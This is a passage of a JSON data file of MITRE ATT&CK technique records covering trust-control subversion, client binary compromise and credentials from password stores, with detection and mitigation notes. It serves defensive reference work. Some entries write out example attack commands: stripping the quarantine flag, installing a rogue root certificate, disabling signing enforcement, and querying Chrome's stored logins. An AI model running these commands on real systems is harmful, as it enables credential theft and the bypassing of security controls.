downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ", + "url": "https://attack.mitre.org/techniques/T1553", + "tactics": [ + "Defense Evasion" + ], + "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Metadata", + "File: File Modification", + "Module: Module Load", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1553.001", + "name": "Subvert Trust Controls: Gatekeeper Bypass", + "url": "https://attack.mitre.org/techniques/T1553/001", + "description": "Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\n\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\n\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)", + "detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1553.002", + "name": "Subvert Trust Controls: Code Signing", + "url": "https://attack.mitre.org/techniques/T1553/002", + "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", + "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", + "mitigations": [] + }, + { + "tid": "T1553.003", + "name": "Subvert Trust Controls: SIP and Trust Provider Hijacking", + "url": "https://attack.mitre.org/techniques/T1553/003", + "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)", + "detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1553.004", + "name": "Subvert Trust Controls: Install Root Certificate", + "url": "https://attack.mitre.org/techniques/T1553/004", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)", + "detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1553.005", + "name": "Subvert Trust Controls: Mark-of-the-Web Bypass", + "url": "https://attack.mitre.org/techniques/T1553/005", + "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)", + "detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1553.006", + "name": "Subvert Trust Controls: Code Signing Policy Modification", + "url": "https://attack.mitre.org/techniques/T1553/006", + "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)", + "detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "cumulative_score": 0.5336310831085714, + "adjusted_score": 0.5336310831085714, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.5,2.6,4.1,4.8,18.3,18.5" + ], + "nist_controls": [ + "AC-6", + "CA-8", + "CM-10", + "CM-2", + "CM-3", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-7", + "IA-9", + "RA-9", + "SA-10", + "SA-11", + "SC-34", + "SI-10", + "SI-2", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1554", + "name": "Compromise Client Software Binary", + "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.", + "url": "https://attack.mitre.org/techniques/T1554", + "tactics": [ + "Persistence" + ], + "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Creation", + "File: File Deletion", + "File: File Metadata", + "File: File Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ], + "cumulative_score": 0.34228571428571425, + "adjusted_score": 0.34228571428571425, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.7,4.1" + ], + "nist_controls": [ + "CA-8", + "CM-2", + "CM-6", + "IA-9", + "SI-7", + "SR-11", + "SR-4", + "SR-5", + "SR-6" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1555", + "name": "Credentials from Password Stores", + "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "url": "https://attack.mitre.org/techniques/T1555", + "tactics": [ + "Credential Access" + ], + "detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1555.001", + "name": "Credentials from Password Stores: Keychain", + "url": "https://attack.mitre.org/techniques/T1555/001", + "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.", + "detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1555.002", + "name": "Credentials from Password Stores: Securityd Memory", + "url": "https://attack.mitre.org/techniques/T1555/002", + "description": "An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)", + "detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.", + "mitigations": [] + }, + { + "tid": "T1555.003", + "name": "Credentials from Password Stores: Credentials from Web Browsers", + "url": "https://attack.mitre.org/techniques/T1555/003", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", + "detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1555.004", + "name": "Credentials from Password Stores: Windows Credential Manager", + "url": "https://attack.mitre.org/techniques/T1555/004", + "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)", + "detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault)\n\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1555.005", + "name": "Credentials from Password Stores: Password Managers", + "url": "https://attack.mitre.org/techniques/T1555/005", + "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)", + "detection": "Consider monitoring API calls, file read 